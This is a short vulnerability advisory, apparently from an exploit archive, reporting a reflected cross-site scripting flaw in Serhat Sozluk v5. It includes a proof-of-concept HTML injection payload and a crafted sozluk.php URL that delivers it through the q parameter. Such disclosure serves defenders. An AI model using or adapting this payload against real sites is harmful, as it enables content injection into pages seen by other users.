Serhat Sozluk version 5 suffers from a cross site scripting vulnerability.
82026baf7b1436103b92a69abab45fdc============================================================================
| # Title : Serhat Sozluk v5 XSS Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : v5 |
| # Vendor : http://wmscripti.com |
| # Dork : n/a |
============================================================================
poc :
Application error message :
[+] Dorking Adegn Google Or Other Search Enggine
[+] use payload : <marquee><font color=lime size=32>indoushka</font></marquee>
http://127.0.0.1/serhatsozlukv5/sozluk.php?process=word&q=deneme%252013%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================